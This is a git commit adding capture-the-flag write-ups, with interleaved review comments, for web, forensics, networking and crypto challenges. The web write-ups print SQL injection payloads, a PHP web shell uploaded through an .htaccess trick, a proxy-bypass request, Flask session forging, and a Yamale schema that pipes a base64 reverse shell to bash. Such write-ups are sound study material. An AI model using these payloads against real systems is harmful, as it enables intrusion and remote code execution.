feat: added The Cyber Cooperative CTF
@ -17,7 +17,7 @@ Given a ZIP file containing server logs from a website. There are 39,099 lines i
## How to Solve?
The first thing I did was to search for any suspicious requests, such as hacking attempts or random requests. In the log, I found 1 IP address, which is `178.19.45.123`, that seems to be involved in hacking attempts.

![suspicious_requests_1](images/suspicious_requests_1.png.png)
![suspicious_requests_1](images/suspicious_requests_1.png)

![ip](images/ip.png)

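Review bot: the `.png.png` path fix is correct, but the paragraph above it still gives no way to reproduce the finding: it says one IP, `178.19.45.123`, "seems to be involved in hacking attempts" in a 39,099-line log without saying what was searched for. Add the filter that surfaced it (the request pattern, or a per-IP request count), and write "one IP address" rather than "1 IP address".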
@ -2,7 +2,7 @@
> Welcome to BugBank, the world's premier banking application for trading bugs! In this new era, bugs are more valuable than gold, and we have built the ultimate platform for you to handle your buggy assets. Trade enough bugs and you have the chance to become a premium member. And in case you have any questions, do not hesitate to contact your personal assistant. Happy trading!

## About the Challenge
We were given a website without a source code. Here is the preview of the website
We were given a website without the source code. Here is the preview of the website

![preview 1](images/preview.png)

@ -2,7 +2,7 @@
> Enter the enigmatic realm of "Father of Light" Unleash your skills, explore hidden paths, and uncover the depths of mysterious creations. Will you emerge as the champion? Dare to unravel the enigma.

## About the Challenge
We were given a website (Without source code) and there is a login page in this website
We were given a website (without the source code) and there is a login page in this website

![preview](images/preview.png)

@ -2,7 +2,7 @@
> I do not know whether I should say that or not, but you must bypass the login in any way, but remember that forcing does not always work. (Make Your Choice)

## About the Challenge
We were given a website (Without source code) and we need to bypass the login page
We were given a website (without the source code) and we need to bypass the login page

![preview](images/preview.png)

@ -2,7 +2,7 @@
> https://bluehens-cat-the-flask.chals.io/greeting/hi

## About the Challenge
We were given a website without a source code, every input after `/greeting/*` is reflected in the website
We were given a website without the source code, every input after `/greeting/*` is reflected in the website

![preview](images/preview.png)

@ -2,7 +2,7 @@
> Comfort food.

## About the Challenge
We were given a website without a source code, and we need to login as admin in order to get the flag
We were given a website without the source code, and we need to login as admin in order to get the flag

![preview](images/preview.png)

@ -3,7 +3,7 @@
> You are a penetration tester hired by a small company who got their website hacked recently. They said the hacker somehow got administrative privilege to the website, but there were no logs indicated that an our main admin account was used in other IP Address else than our administrator IP Address. Can you help this company to find the vulnerabilities so that they can patch it ASAP?

## About the Challenge
We were given a website without a source code, and there are some functionality such as:
We were given a website without the source code, and there are some functionality such as:
* Register
* Login
* Setting acount

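Review bot: "Setting acount" in the last list item is a typo this hunk leaves in place; since the line just above it is being edited anyway, change it to "Account settings", and add the comma in "some functionality, such as:".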
@ -28,11 +28,11 @@ cat usbms.json | grep '"52617221'

Okay we found it, and then I submitted the hex code into CyberChef

![Alt text](image.png)
![Alt text](images/rar.png)

As you can see, there is a file with a `.bat` extension—hmm, weird. If you analyze the RAR file, this is the payload for `CVE-2023-38831`. And then I extracted the bat file and submitted into a sandbox malware online platform

![Alt text](image-1.png)
![Alt text](images/flag.png)

```
STS23{C0mPrem1zed_d3sktop_h3h3}

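Review bot: "If you analyze the RAR file, this is the payload for `CVE-2023-38831`" states the conclusion without the evidence. The archive was carved from the `52617221` (`Rar!`) match in `usbms.json`, so list its entries (for example with `unrar l` or `7z l`) and say which feature of that layout identifies the CVE; as written a reader has to take it on trust. Also "submitted into a sandbox malware online platform" reads better as "submitted it to an online malware sandbox".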
@ -128,10 +128,10 @@ List of CTF events that i have joined before
| NewportBlakeCTF 2023 | Yes | [Link](/NewportBlakeCTF%202023/) |
| Hackappatoi CTF '23 | No | - |
| pingCTF 2023 | Yes | [Link](/pingCTF%202023/) |
| The Cyber Cooperative CTF | Yes | - |
| The Cyber Cooperative CTF | Yes | [Link](/The%20Cyber%20Cooperative%20CTF/) |
| BackdoorCTF 2023 | No | - |
| 1st Annual TCM Invitational CTF | No | - |
| niteCTF 2023 | Yes | - |
| niteCTF 2023 | Yes | [Link](/niteCTF%202023/) |

### Local Events
| Event Name | Writeup Available? | Writeup Link |

@ -0,0 +1,44 @@
# Back In My Day
> Back in my day sharing files was a lot harder!!!

## About the Challenge
We were given a pcapng file where each steam contain UUencoded messages

![preview](images/preview.png)

## How to Solve?
So I made another python script to decode the messages (There's decoder online, but because the size was large, so I decided to create another python script to solve this)

```python
import uu
import io

def decode_uuencoded_file(file_path):
    with open(file_path, 'rb') as file:
        uuencoded_data = file.read()

    decoded_file = uu.decode(io.BytesIO(uuencoded_data))

    return decoded_file[0]

file_path = 'file.txt'
decoded_data = decode_uuencoded_file(file_path)

if decoded_data:
    print("Decoded data:")
    print(decoded_data.decode('utf-8'))
```

So, the flow will looks like this

```
check the stream (Ex: first stream) -> copy manually into file.txt -> decode -> next stream -> repeat
```

And the flag was located in stream 55

![flag](images/flag.png)

```
flag{outta_the_way_ya_old_geezer}
```
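Review bot: `decode_uuencoded_file` cannot return what the text says it does. `uu.decode(in_file)` called without `out_file` writes the decoded bytes to the file named on the `begin` line and returns `None`, so `decoded_file[0]` raises `TypeError` and the `if decoded_data:` branch never runs. Pass an `io.BytesIO()` as `out_file` and return its `getvalue()` (or decode line by line with `binascii.a2b_uu`), and note that the `uu` module is deprecated since Python 3.11 and removed in 3.13. The "copy manually into file.txt" loop over 55 streams could also be replaced by one `tshark -q -z follow,tcp,ascii,N` call per stream. Typos: "each steam contain" should be "each stream contains", and "the flow will looks like this" should be "the flow looks like this".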
@ -0,0 +1,13 @@
# The Cyber Cooperative CTF
CTF writeup for The The Cyber Cooperative CTF. I took part in this CTF competition with the HCS team and secured the 34th place out of 432 teams

| Category | Challenge |
| --- | --- |
| Web | [inbox](/The%20Cyber%20Cooperative%20CTF/inbox/)
| Web | [facegram](/The%20Cyber%20Cooperative%20CTF/facegram/)
| Web | [grayboard](/The%20Cyber%20Cooperative%20CTF/grayboard/)
| Web | [valid yaml](/The%20Cyber%20Cooperative%20CTF/valid%20yaml/)
| Forensic | [funding secured](/The%20Cyber%20Cooperative%20CTF/funding%20secured/)
| Forensic | [secure router](/The%20Cyber%20Cooperative%20CTF/secure%20router/)
| Networking | [Back In My Day](/The%20Cyber%20Cooperative%20CTF/Back%20In%20My%20Day/)
| Cryptography | [slots](/The%20Cyber%20Cooperative%20CTF/slots/)

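Review bot: "CTF writeup for The The Cyber Cooperative CTF" doubles "The". The challenge rows also drop the trailing `|` that the header and separator rows carry; GitHub renders both forms, but keep the table consistent.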
@ -0,0 +1,63 @@
# facegram
> This punk kid stole my idea for a photo sharing site! Can you break into it for me?

## About the Challenge
We were given a website without the source code, and this website has a lot of functionality

* View uploaded image (`/view.php?id=1`)
* View profile (`/user.php?id=1`)
* Login (`/login.php`)
* Register (`/register.php`)
* Forgot password (`/forgot-password.php`)
* Upload image (`/upload.php`)

![flag](images/preview.png)

## How to Solve?
Initially, I attempted to register and log in to my account, and then successfully uploaded a PHP file. However, when visiting the uploaded file at the `/uploads/` endpoint, the output showed `403 Forbidden`

![flag](images/user-upload.png)

I also tried to change the extension (Ex: .phar, .inc), the mime type, etc but it still doesn't works because the website will read my file as a plain text

![flag](images/testing-phar.png)

And then I attempted to exploit the website using SQL injection vulnerabilities on some endpoints but failed. Subsequently, I tried to perform SQL injection on the login page to log in as an `admin`, and it was successful. Here is the payload I used to login as an `admin`

```
username: admin' or true-- -
password: test
```

![flag](images/bypass-admin.png)

In the admin panel, there are two new features:

* Manage user
* Upload zip file

![flag](images/admin-panel.png)

![flag](images/zip-upload.png)

Hmmm, a `zip` file? I tried uploading a random zip file, and this feature will unzip our uploaded file, placing each file from the zip in the /uploads directory.

So I created a `.htaccess` file, and its content will look like this:

```
AddType application/x-httpd-php .php16
```

I also added another PHP file, but I'm using `.php16` as the extension.

```php
<?php echo system($_GET['cmd']); ?>
```

And heck yeah! we can execute OS command right now

![flag](images/flag.png)

```
flag{but_i_thought_zips_only_went_up}
```
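Review bot: the key step is shown but not explained. The `403 Forbidden` on the first `.php` upload shows that PHP is denied under `/uploads/`, and the `.htaccess` dropped there by the zip extraction only defeats that because the server honors per-directory overrides in that directory (`AllowOverride`), so `AddType application/x-httpd-php .php16` maps a fresh extension to PHP that the existing rules neither block nor serve as text. One sentence saying so, plus the observation that the zip step keeps filenames as-is (dotfiles included), would make the chain clear to a reader. Minor: in `<?php echo system($_GET['cmd']); ?>` the `echo` is redundant (`system()` already prints the output, so the last line appears twice), and every image in this file has the alt text `flag`, including the preview and upload screenshots.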
@ -0,0 +1,26 @@
# funding secured
> Someone in our company leaked some very sensitive information. We absolutely cannot let this stand.

> Thankfully our monitoring software intercepted the screenshot that was leaked. An old engineer of ours did write some kind of watermarking for screenshots but we have no idea how it works. Can you figure it out?

## About the Challenge
We were given an image (You can download the image [here](captured.png)) and when I scanned the image using Aperisolve, I found something interesting in the `zsteg` output

![zsteg](images/zsteg.png)

## How to Solve?
So, I believe there's a file inside this image. Initially, I tried using `binwalk` to extract the file, but failed. It seems like we need to use LSB steganography to extract the file.

So I used this [website](https://stegonline.georgeom.net/extract) and then, using the `Extract Data` feature voilà! I found a ZIP file.

![lsb](images/lsb.png)

But when I extracted it, I only got 2 files: `exif.txt` and `creator.txt`, But in the ASCII text, there's another file called `flag.txt`. So I decided to use CyberChef and then use `Extract LSB` option

![cyberchef](images/cyberchef.png)

Download the zip file and then read `flag.txt` file

```
flag{what_came_first_the_stego_or_the_watermark}
```
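Review bot: the two extractions disagree (StegOnline's `Extract Data` produced a zip holding only `exif.txt` and `creator.txt`, CyberChef's `Extract LSB` produced one that also holds `flag.txt`), yet neither the bit planes and channels selected in those tools nor the `zsteg` line that pointed at them is written down; they exist only in screenshots. Put the settings in the text so the result is reproducible, and say what `binwalk` actually reported when it "failed".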
@ -0,0 +1,60 @@
# grayboard
> My homework for my web design class is really bad but I don't know what to do. I really need to pass this class, can you help me?

## About the Challenge
We were given a website without the source code and there are some functionality such as:

* Login
* Register
* Submit a submissions

![preview](images/preview.png)

## How to Solve?
When you read the description on the homepage:

```
Your web design homework is due by tomorrow! Please be sure to submit your homework on time and I will personally grade it.
```

Additionally, if you use `CTRL + U` on any page of the website, you will find another endpoint inside an HTML comment:

```html
<!-- <div class="text-center fixed-bottom">
    <footer class="text-center fixed-bottom">
        <small><a href="/internal">Internal</a></small>
    </footer>
</div> -->
```

![forbidden-access](images/forbidden-access.png)

I'm sure this website is vulnerable to XSS. We need to steal the admin cookie and access the `/internal` endpoint after obtaining the admin cookie. So I submitted a XSS payload into a submission form

![xss](images/xss.png)

![cookie](images/cookie.png)

Wait for a while and we got the cookie! Now, we can login as an admin

![internal](images/internal.png)

![nternal-redirect](images/internal-redirect.png)

> Because this part is a little bit guessy so I will skipped some explanation here.

It appears that accessing the `/internal*` endpoint will result in a 403 Forbidden error. Since this website uses `gunicorn` and `nginx`, I found this [writeup](https://ctf.zeyu2001.com/2021/csaw-ctf-qualification-round-2021/gatekeeping). We can bypass it using `SCRIPT_NAME`, so the final payload will look like this

```
GET /test/internal/submissions HTTP/1.1
Host: thecybercoopctf-grayboard.chals.io
Cookie: session=eyJpZCI6MSwidHlwZSI6ImFkbWluIiwidXNlcm5hbWUiOiJhZG1pbiJ9.ZYEGzw.Npm8_EdpYT5BSQnWOejvMaiW5gA
Upgrade-Insecure-Requests: 1
SCRIPT_NAME: /test
```

![flag](images/flag.png)

```
flag{why_yes_i_am_valedictorian_but_dont_ask_how}
```
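Review bot: the final request is given without saying why it works, and the note above it announces that the explanation is skipped. The 403 comes from the nginx rule matching the `/internal` path; the request path `/test/internal/submissions` does not match it, and the `SCRIPT_NAME: /test` header makes gunicorn strip the `/test` prefix from the path before routing, so the Flask app still sees `/internal/submissions`. That is what the linked CSAW write-up describes and deserves one sentence here. Also include the XSS payload that was submitted (it appears only in a screenshot), fix "I will skipped" to "I will skip" and the alt text "nternal-redirect", and consider redacting the `session=` value even though the CTF is over.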
@ -0,0 +1,34 @@
# inbox
> I heard this email server has two halves of a whole flag in it!

## About the Challenge
We were given a website without the source code and there are some functionality such as:
* Search users
* Read an email

![preview](images/preview.png)

## How to Solve?
If there's a search feature in this website, the first vulnerability that comes to my mind is SQL injection. First, I tried UNION-based SQL injection:

![sqli](images/sqli.png)

As we can see here, the website is vulnerable to SQL injection. In order to obtain the flag, we need to read a `flags` table using this payload."

```
' UNION SELECT (SELECT flag from flags),2-- -
```

![part1](images/part1.png)

We got the first path! And now we need to get the second part.There's a path traversal vulnerability in `/mail/` endpoint. When I tried a random string (Ex: `/main/test`). The output:

![path-traversal](images/path-traversal.png)

To obtain the second part of the flag, we can use the `../flag.txt`

![part2](images/part2.png)

```
flag{off_to_a_good_start_even_better_finish_though}
```
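Review bot: "We got the first path!" should be "first part", the sentence before the payload ends with a stray `."`, "second part.There's" is missing a space, and the traversal example reads `/main/test` while the endpoint it describes is `/mail/`. It would also help to say how the two-column shape of the `' UNION SELECT ..., 2` payload was established; the injection screenshot implies it, but the text does not.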
@ -0,0 +1,72 @@
# secure router
> My friend bought this router. I want to hack into it so bad.

> The firmware for the router is online. There's gotta be bugs in it...

## About the Challenge
We were given a website and also a squashfs filesystem

![preview 1](images/preview1.png)

![preview 2](images/preview2.png)

## How to Solve?
There are 5 perl code in `var/www/` directory

![www](images/www.png)

To obtain the flag, we need to acquire the credentials first and then log in. To retrieve the credentials, we can use `MCU_recover_credentials.pl` and `MCU_serial_forgot_password.pl`. Here is the content of `MCU_recover_credentials.pl`:

```perl
...
$timestamp = strftime("%j%m%H%M%Y", localtime);

open(FH,"username.txt") or &dienice("Can't open username.txt: $!");
$username = <FH>;
close(FH);

open(FH,"password.txt") or &dienice("Can't open password.txt: $!");
$password = <FH>;
close(FH);

print "Content-type:text/html\r\n\r\n";

if ($FORM{id} ne $timestamp){
    print "<html>";
    print "<head>";
    print "<title>Secure Router</title>";
    print "</head>";
    print "<body>";
    print "<center><p>Sorry, your timestamp nonce has expired</p></center>";
    print "</body>";
    print "</html>";
    exit 0;
}

print "<html>";
print "<head>";
print "<title>Secure Router</title>";
print "</head>";
print "<body>";
print "<p>Password recovered</p>";
print "<p>$username</p>";
print "<p>$password</p>";
print "</body>";
print "</html>";
```

We need to provide the correct nonce / timestamp to recover the credential. And to get the correct nonce, we can use `MCU_serial_forgot_password.pl` because the code leaked the nonce

![nonce](images/nonce.png)

Copy the `nonce` and paste it into the `id` parameter of the `MCU_recover_credentials.pl`file.

![credentials](images/credentials.png)

Use the credentials to log in to the website.

![flag](images/flag.png)

```
flag{based_on_a_true_router_cve_story}
```
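Review bot: the root cause is understated. `$timestamp = strftime("%j%m%H%M%Y", localtime)` is just the current day-of-year, month, hour, minute and year, so the "nonce" is computable by anyone who knows the router's clock to the minute; the leak in `MCU_serial_forgot_password.pl` is the shortcut, but removing it would not fix the recovery endpoint, and the write-up should say so since the only check before printing the password is `$FORM{id} ne $timestamp`. Also "There are 5 perl code in `var/www/` directory" should be "There are five Perl scripts in the `var/www/` directory", and the code that fills `%FORM` sits in the elided `...`; a note that `id` is the only request input consulted would help.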
@ -0,0 +1,114 @@
# slots
> I heard about this scam that let people rob some slot machines. Can you do it with this slot machine?

## About the Challenge
We were given a server to connect and also a python code.

```python
#!/usr/bin/env python
import random


def check(f1, f2, f3):
    if f1[0] == f1[1] == f1[2]:
        return True, f1[0] + f1[1] + f1[2]

    if f2[0] == f2[1] == f2[2]:
        return True, f2[0] + f2[1] + f2[2]

    if f3[0] == f3[1] == f3[2]:
        return True, f3[0] + f3[1] + f3[2]

    if f1[0] == f2[1] == f3[2]:
        return True, f1[0] + f2[1] + f3[2]

    if f1[2] == f2[1] == f3[0]:
        return True, f1[2] + f2[1] + f3[0]

    return False, "###"


def rng():
    test = str(random.getrandbits(32))
    test = test.zfill(10)
    return test


def server():
    money = 1000
    print(
        """
   _____ __    ____  ___________
  / ___// /   / __ \/_  __/ ___/
  \__ \/ /   / / / / / /  \__ \\
 ___/ / /___/ /_/ / / /  ___/ /
/____/_____/\____/ /_/  /____/
"""
    )

    print(f"YOU HAVE {money} MONEY")
    print()
    print(f"YOU WIN FOR EVERY MATCHING HORIZONTAL OR DIAGONAL LINE")
    print(f"FOR EVERY WIN YOULL GET YOUR WAGER TIMES THE MULTIPLIER")
    print(f"MAKE IT TO 1,000,000 FOR A FLAG")

    while True:
        try:
            wager = int(input("WAGER? "))
        except:
            wager = 1

        if wager < 0:
            print("SORRY BUD WE'RE NOT A BANK")
            exit()

        money -= wager

        start = rng()

        r1 = start[0:3]
        r2 = start[3:6]
        r3 = start[6:9]
        multi = start[9]

        f1 = r1[2] + r2[2] + r3[2]
        f2 = r1[1] + r2[1] + r3[1]
        f3 = r1[0] + r2[0] + r3[0]

        print()
        print("=>", f1[0], f1[1], f1[2])
        print("=>", f2[0], f2[1], f2[2])
        print("=>", f3[0], f3[1], f3[2])
        print(f"MULTIPLIER={multi}")
        print()

        result, hit = check(f1, f2, f3)

        if result is True:
            print("WINNER!", hit)
            money += wager * int(multi)
        else:
            print("BETTER LUCK NEXT TIME")

        print(f"YOU HAVE {money} MONEY")

        if money <= 0:
            print("SORRY BUD YOU'RE OUT OF CASH")
            exit()
        if money >= 1000000:
            print("FLAG REDACTED")
            exit()


if __name__ == "__main__":
    server()
```

## How to Solve?
I solved this challenge using an unintended way because we could wager more than our balance. Therefore, I tried to wager 100000000 the first time I connected to the server

![flag](images/flag.png)

```
flag{only_true_twisters_beat_the_house}
```
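Review bot: the write-up should say why the oversized wager works and when it does not. The server only rejects `wager < 0`; there is no `wager > money` check, so `money -= wager` leaves `1000 - 100000000`, and the very next spin decides everything: a win with `multi` of 2 or more puts `money` past 1,000,000 and prints the flag, a win with `multi` 1 merely restores the 1000, and any loss (or a win with `multi` 0) trips `money <= 0` and ends the connection, so the trick needs a few reconnects. The intended route the flag name points at also deserves a line: `rng()` prints all ten digits of `random.getrandbits(32)` every spin, which is the classic setup for recovering the Mersenne Twister state from 624 outputs and predicting the following spins.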
@ -0,0 +1,100 @@
# valid yaml
> Yet Another Markup Language, YAML, YAML Ain't Markup Language, Yamale

## About the Challenge
We were given a website with a source code (You can download the source code [here](src.zip)), on this website we can validate our YAML file

![preview](images/preview.png)

The website also utilizes `Yamale 3.0.8` to validate our YAML file."

## How to Solve?
Yamale 3.0.8 is vulnerable to RCE (You can check the detail [here](https://github.com/23andMe/Yamale/issues/167))

```python
schema = yamale.make_schema(content="""
name: str([x.__init__.__globals__["sys"].modules["os"].system("echo 'test' > test") for x in ''.__class__.__base__.__subclasses__() if "_ModuleLock" == x.__name__])
age: int(max=200)
height: num()
awesome: bool()
""")

# Create a Data object
data = yamale.make_data(content="""
name: Bill
age: 200
height: 6.2
awesome: True
""")

# Validate data against the schema. Throws a ValueError if data is invalid.
yamale.validate(schema, data)
```

But we can't exploit this vulnerability immediately because we can only control the data object, not the schema. However, if we check the source code, when logged in as an admin, we can create/edit our own schema.

```python
@app.route("/admin/schemas", methods=["GET", "POST"])
@authed_only
def schemas():
    if request.method == "GET":
        schemas = Schemas.query.all()
        return render_template("schemas.html", schemas=schemas)
    elif request.method == "POST":
        name = request.form["name"]
        content = request.form["content"]
        schema = Schemas(name=name, content=content)
        db.session.add(schema)
        db.session.commit()
        return redirect(url_for("schema", schema_id=schema.id))


@app.route("/admin/schemas/<int:schema_id>", methods=["GET", "POST"])
@authed_only
def schema(schema_id):
    schema = Schemas.query.filter_by(id=schema_id).first_or_404()
    if request.method == "GET":
        return render_template("schema.html", schema=schema)
    elif request.method == "POST":
        name = request.form["name"]
        content = request.form["content"]
        schema.name = name
        schema.content = content
        db.session.commit()
        return redirect(url_for("schema", schema_id=schema.id))
```

To logged in as an admin, we can manipulate the cookie because of the app secret key is predictable

```python
class Config(object):
    SECRET_KEY = hashlib.md5(
        datetime.datetime.utcnow().strftime("%d/%m/%Y %H:%M").encode()
    ).hexdigest()
    BOOTSTRAP_SERVE_LOCAL = True
    SQLALCHEMY_DATABASE_URI = "sqlite:///app.db"
    SQLALCHEMY_TRACK_MODIFICATIONS = False
```

Note when you deploy the website, then you will know the secret key. And then use `flask-unsign` command to create the cookie, here is the payload I used to login as an admin

```bash
flask-unsign --sign --cookie '{"id": 1}' --secret 'cb9a2657b00b63983cf7217b268855eb'
```

![loggedin](images/loggedin.png)

Use the public proof of concept to perform Remote Code Execution (RCE). Here is the schema I used to do a reverse shell.

```yaml
name: str([x.__init__.__globals__["sys"].modules["os"].system("echo AAAAAAAAAAA== | base64 -d | bash") for x in ''.__class__.__base__.__subclasses__() if "_ModuleLock" == x.__name__])
age: int(max=200)
height: num()
awesome: bool()
```

![flag](images/flag.png)

```
flag{not_even_apache_can_stop_the_mighty_eval}
```
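Review bot: the jump to `--secret 'cb9a2657b00b63983cf7217b268855eb'` is unexplained. `SECRET_KEY` is the MD5 of the UTC start time at minute resolution, so for the remote instance the key has to be either known from the deploy time or enumerated over candidate minutes and checked against a session cookie issued by the server (for example with `flask-unsign --unsign --wordlist`); say which was done, because "when you deploy the website, then you will know the secret key" only covers a local copy. Also: `/admin/schemas` is guarded by `@authed_only` and the forged cookie is just `{"id": 1}`, so state what that decorator checks; the sentence ending `YAML file."` has a stray quote; "To logged in as an admin" should be "To log in as an admin"; and the `AAAAAAAAAAA==` base64 is obviously a placeholder, which is fine but should be labelled as one.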
@ -2,7 +2,7 @@
> My first flask app, I hope you like it

## About the Challenge
We were given a website without source code
We were given a website without the source code

![preview](images/preview.png)
